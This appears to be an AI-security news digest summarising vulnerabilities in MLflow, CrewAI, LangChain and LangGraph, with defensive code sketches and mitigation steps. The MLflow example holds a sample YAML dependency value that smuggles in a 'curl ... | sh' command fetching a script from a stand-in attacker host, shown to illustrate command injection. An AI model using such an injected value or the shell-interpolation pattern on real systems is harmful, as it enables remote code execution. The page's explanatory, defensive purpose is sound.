The security intelligence platform for AI teams
AI security threats move fast and get buried under hype and noise. This platform, built by an Information Systems Security researcher, helps security teams and developers stay ahead of vulnerabilities, privacy incidents, safety research, and policy developments.
Anthropic's Leaked "Mythos" Model Raises Cybersecurity Concerns: An accidental configuration leak revealed Anthropic's unreleased Mythos model, which has advanced reasoning and coding abilities including recursive self-fixing (autonomously finding and patching its own bugs). The model's improved capability to find and exploit software vulnerabilities could enable more sophisticated cyberattacks, prompting Anthropic to plan a cautious rollout targeting enterprise security teams first.
Critical Command Injection in MLflow Model Deployment: MLflow has a command injection vulnerability (where an attacker inserts malicious commands into input that gets executed) in its model serving code when deploying models with `env_manager=LOCAL`. The vulnerable code reads dependency information from `python_env.yaml` and passes it to a shell without validation, allowing arbitrary command execution on deployment systems. (CVE-2025-15379, critical severity)
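To make the flaw class concrete, here is a minimal sketch of shell interpolation of config-derived strings and the safer alternative. This is not MLflow's actual serving code; the YAML payload, the `evil.example` URL, and the pip invocation are illustrative assumptions.

```python
import subprocess
import yaml

# Hedged sketch of the vulnerability class described above -- NOT MLflow's
# actual code. A hypothetical python_env.yaml an attacker could ship with a model:
malicious_yaml = """
dependencies:
  - "numpy; curl https://evil.example/x.sh | sh"
"""
env = yaml.safe_load(malicious_yaml)

# Vulnerable pattern: joining unvalidated strings into one shell command.
# With shell=True the shell parses the ';' -> arbitrary command execution.
# subprocess.run("pip install " + " ".join(env["dependencies"]), shell=True)

# Safer pattern: pass each dependency as its own argv token with no shell
# involved, so pip simply rejects the malformed requirement string.
print(["pip", "install", *env["dependencies"]])
```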
Multiple High-Severity Vulnerabilities Found in CrewAI: CrewAI has several serious security flaws, including two that enable RCE (remote code execution, where attackers run commands on systems they don't control) when Docker containerization fails and the system falls back to less secure sandbox settings. Additional vulnerabilities allow arbitrary file reading and SSRF (server-side request forgery, tricking a server into making unwanted requests) through improper validation in RAG search tools. (CVE-2026-2287, CVE-2026-2275, CVE-2026-2285, CVE-2026-2286)
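The unsafe-fallback pattern behind the RCE bugs can be sketched generically; this is not CrewAI's code, and the `run_untrusted` helper and `python:3.12-slim` image choice are assumptions for illustration. The point is to fail closed rather than degrade the sandbox.

```python
import shutil
import subprocess

# Hedged sketch of the unsafe-fallback class described above -- not CrewAI's
# code. The anti-pattern is silently executing untrusted (often LLM-generated)
# code on the host when Docker is unavailable; the safer design fails closed.
def run_untrusted(code: str, timeout: int = 30) -> str:
    if shutil.which("docker") is None:
        # Vulnerable variant would do something like exec(code) here,
        # running attacker-influenced code directly on the host.
        raise RuntimeError("sandbox unavailable; refusing to run untrusted code")
    result = subprocess.run(
        ["docker", "run", "--rm", "--network=none", "python:3.12-slim",
         "python", "-c", code],
        capture_output=True, text=True, timeout=timeout,
    )
    return result.stdout

print(run_untrusted("print('sandboxed')"))  # needs Docker; otherwise fails closed
```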
LangChain Path Traversal Adds to AI Pipeline Security Woes: LangChain and LangGraph have critical flaws allowing attackers to steal sensitive data such as API keys through improper input handling, including a new path traversal bug (CVE-2026-34070, CVSS 7.5) that lets attackers read arbitrary files. Maintainers have released fixes that should be applied immediately.
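For teams hardening their own file-handling code against the same class of bug, a standard containment check looks like the sketch below. This is a generic mitigation pattern, not LangChain's patched code; the `safe_read` name is hypothetical.

```python
from pathlib import Path

# Generic mitigation sketch for the path traversal class -- not LangChain's
# patched code. Resolve the requested path and confirm it stays under the
# allowed root before reading anything.
def safe_read(root: str, user_path: str) -> str:
    base = Path(root).resolve()
    target = (base / user_path).resolve()  # collapses "../" and symlinks
    if not target.is_relative_to(base):  # Path.is_relative_to: Python 3.9+
        raise PermissionError(f"path escapes {base}: {user_path}")
    return target.read_text()

# safe_read("/srv/docs", "../../etc/passwd")  # raises PermissionError
```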
Fix: LangGraph provides several mitigation options (see the configuration sketch after this list):
1. Set the environment variable `LANGGRAPH_STRICT_MSGPACK` to a truthy value (`1`, `true`, or `yes`) to enable strict mode, which blocks unsafe object types by default.
2. Configure `allowed_msgpack_modules` on your serializer or checkpointer: `None` enables strict mode (only safe types allowed), a custom allowlist like `[(module, class_name), ...]` permits specific modules and classes, and `True` (the default) allows all types but logs warnings.
3. When compiling a `StateGraph` with `LANGGRAPH_STRICT_MSGPACK` enabled, LangGraph automatically derives an allowlist from the graph's schemas and channels and applies it to the checkpointer.
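A minimal sketch of options (1) and (2) in code. The env var and the `allowed_msgpack_modules` setting come from the advisory text above, but the exact constructor placement on `JsonPlusSerializer` is an assumption that may vary by LangGraph version, and the `myapp.schemas.AgentState` allowlist entry is hypothetical; check your installed version's docs.

```python
import os

# Option (1): enable strict msgpack mode before graph/checkpointer construction.
# Unsafe object types are then blocked by default during deserialization.
os.environ["LANGGRAPH_STRICT_MSGPACK"] = "1"

# Option (2): pass an explicit allowlist. Parameter placement below is an
# assumption based on the advisory's description -- verify against your
# installed LangGraph version.
from langgraph.checkpoint.memory import MemorySaver
from langgraph.checkpoint.serde.jsonplus import JsonPlusSerializer

serde = JsonPlusSerializer(
    allowed_msgpack_modules=[("myapp.schemas", "AgentState")],  # None = strict
)
checkpointer = MemorySaver(serde=serde)
```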
GitHub Advisory Database